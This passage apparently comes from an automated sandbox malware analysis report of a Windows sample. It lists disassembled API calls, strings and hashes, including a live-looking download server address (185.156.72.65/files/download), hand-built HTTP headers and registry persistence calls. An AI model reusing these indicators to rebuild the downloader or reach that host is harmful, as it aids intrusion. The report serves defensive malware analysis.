                                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                                                    Strings
                                                    • text, xrefs: 00401B8F
                                                    • GET, xrefs: 004020E7
                                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                                                    • http://, xrefs: 00401EF4, 004021D3
                                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                                    • API String ID: 2146599340-4172842843
                                                    • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                                                    • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                                                    • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                                                    • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4
                                                    APIs
                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DecodePointer
                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                    • API String ID: 3527080286-3064271455
                                                    • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                                                    • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                                                    • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                                                    • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                                                    APIs
                                                    • type_info::operator==.LIBVCRUNTIME ref: 0495C081
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0495C18F
                                                    • _UnwindNestedFrames.LIBCMT ref: 0495C2E1
                                                    • CallUnexpected.LIBVCRUNTIME ref: 0495C2FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2751267872-393685449
                                                    • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                    • Instruction ID: 49a077c02193fad4963031e610288ab3dde81cabf894039e6f2048b220070edb
                                                    • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                    • Instruction Fuzzy Hash: 9DB11671800309AFDF29DFA4D8809AEBBB9BF44314F24456AEC156B221D771FA91CB91
                                                    APIs
                                                    • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                                                    • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                                                    • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                                                    • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 2751267872-393685449
                                                    • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                    • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                                                    • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                                                    • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                                                    APIs
                                                    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                                                    • Sleep.KERNELBASE(000003E8), ref: 00405AB0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateOpenSleepValue
                                                    • String ID: 185.156.72.65$185.156.72.65$mixone
                                                    • API String ID: 4111408922-485810328
                                                    • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                                                    • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                                                    • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                                                    • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04959E22), ref: 04959E50
                                                    • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04959E22), ref: 04959E5B
                                                    • GetModuleHandleW.KERNEL32(0042000C,?,?,04959E22), ref: 04959E6C
                                                    • GetProcAddress.KERNEL32(00000000,00420028), ref: 04959E7E
                                                    • GetProcAddress.KERNEL32(00000000,00420044), ref: 04959E8C
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04959E22), ref: 04959EAF
                                                    • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04959ECB
                                                    • CloseHandle.KERNEL32(0042D060,?,?,04959E22), ref: 04959EDB
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                    • String ID:
                                                    • API String ID: 2565136772-0
                                                    • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                    • Instruction ID: f95af81ad5315ca355b259ccfb780d6e2e4be1318cf8d3b911b16a674888c97b
                                                    • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                                    • Instruction Fuzzy Hash: C0015271F40711EBE7209BB4BC0DB9B3AECAB48705B604135BD05E2171DB78D80B8B68
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                                                    • Instruction ID: 79f55e3a299b863bd512580f25b7e7a2d94f51e119f061a2853a0a3e81ce9c19
                                                    • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                                                    • Instruction Fuzzy Hash: BCB16B32A00365AFEB11CF98CC81FAE7BA9EF95314F154175E906AF281D274B901CBA5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                                                    • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                                                    • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                                                    • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                                                      • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                    • String ID: 185.156.72.65$string too long
                                                    • API String ID: 2123813255-2459586365
                                                    • Opcode ID: a464e1c4270cde76215e975e717d90f8a41cfc0ed563e9a2ce9e57d0f7efb903
                                                    • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                                                    • Opcode Fuzzy Hash: a464e1c4270cde76215e975e717d90f8a41cfc0ed563e9a2ce9e57d0f7efb903
                                                    • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 0040B837
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                                                    • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                                                    • _ValidateLocalCookies.LIBCMT ref: 0040B948
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                    • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                                                    • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                                                    • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                                                    APIs
                                                    • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3664257935-537541572
                                                    • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                    • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                                                    • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                    • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0495BC22,0495B1C6,0495A9D7), ref: 0495BC39
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0495BC47
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0495BC60
                                                    • SetLastError.KERNEL32(00000000,0495BC22,0495B1C6,0495A9D7), ref: 0495BCB2
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                    • Instruction ID: fa83bc30c76dc1b346922600d2384d1d63f280bec9cd6f43eb71c9ca7c8fbf1c
                                                    • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                    • Instruction Fuzzy Hash: 1901B5322097119EB735ABBCFCC5A5B2A68EB4167C3704239ED24950F1EF5178055348
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                                                    • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                    • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                                                    • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                    • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0495186C
                                                      • Part of subcall function 04959AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04959AF5
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518A2
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518D9
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 049519EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                    • String ID: 185.156.72.65
                                                    • API String ID: 2123813255-1765470537
                                                    • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                                                    • Instruction ID: a7ed5558de41f27cae143ab3c72e322dddedd3e6f85bbaf2a4dca6a38d894550
                                                    • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                                                    • Instruction Fuzzy Hash: 1941D7B1E00301EBE724DF64AC86B5AB6F8EF44214F300639ED5AD72A0E771B944C7A1
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F7F2B484,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                                                    • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                                                    • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                                                    • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                                                    APIs
                                                    • __alloca_probe_16.LIBCMT ref: 004150D5
                                                    • __alloca_probe_16.LIBCMT ref: 0041519E
                                                    • __freea.LIBCMT ref: 00415205
                                                      • Part of subcall function 00413CB9: HeapAlloc.KERNEL32(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                                                    • __freea.LIBCMT ref: 00415218
                                                    • __freea.LIBCMT ref: 00415225
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                    • String ID:
                                                    • API String ID: 1096550386-0
                                                    • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                                                    • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                                                    • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                                                    • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                                                    APIs
                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 04952D5F
                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04952D74
                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04952D82
                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04952D9D
                                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04952DBC
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                    • String ID:
                                                    • API String ID: 2509773233-0
                                                    • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                                    • Instruction ID: ad75ccc773eceebc192db8fb39c2314cbaead7f3e8e0fd29d23a60f79af1df4f
                                                    • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                                                    • Instruction Fuzzy Hash: 9131E532B00104AFEB14DF58DC40FAAB7B8EF48700F6541F9ED059B2A2DB31A916CB94
                                                    APIs
                                                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                                                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                                                    • __Init_thread_footer.LIBCMT ref: 04951622
                                                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                                                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                    • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                                                    • API String ID: 4132704954-3011832937
                                                    • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                                                    • Instruction ID: f2a4a027ef8a0ee0b3476cacc3b775bdd46468fee5a2291894e2f4cb192b192f
                                                    • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                                                    • Instruction Fuzzy Hash: 2F2146B0F00244DAE730DF29E8467A9B3A0FB55308FB48279DC455B271DBB52986CB09
                                                    APIs
                                                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                                                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                                                    • __Init_thread_footer.LIBCMT ref: 004013BB
                                                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                                                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                                                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                    • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                                                    • API String ID: 2296764815-3011832937
                                                    • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                                                    • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                                                    • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                                                    • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                                                    • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                                    • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                                                    • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                                                    • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04969996
                                                      • Part of subcall function 049651FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04965462,?,00000000,-00000008), ref: 04965260
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04969BE8
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04969C2E
                                                    • GetLastError.KERNEL32 ref: 04969CD1
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2675683661.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_4950000_607f096cd3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 2112829910-0
                                                    • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                                                    • Instruction ID: 090ace3839b3da5c97d2318d0a6ade9401a9e7bae4a9c71c157b85b3dba30f2d
                                                    • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                                                    • Instruction Fuzzy Hash: F3D16BB5E002489FCF15CFE8D8809ADBBF9FF49314F28456AE45AEB351D630A946CB50
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32(F7F2B484,00000000,00000000,00000000), ref: 0041972F
                                                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                                                    • GetLastError.KERNEL32 ref: 00419A6A
                                                    Memory Dump Source
                                                    • Source File: 0000000E.00000002.2672871418.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_14_2_400000_607f096cd3.jbxd
                                                    Yara matches
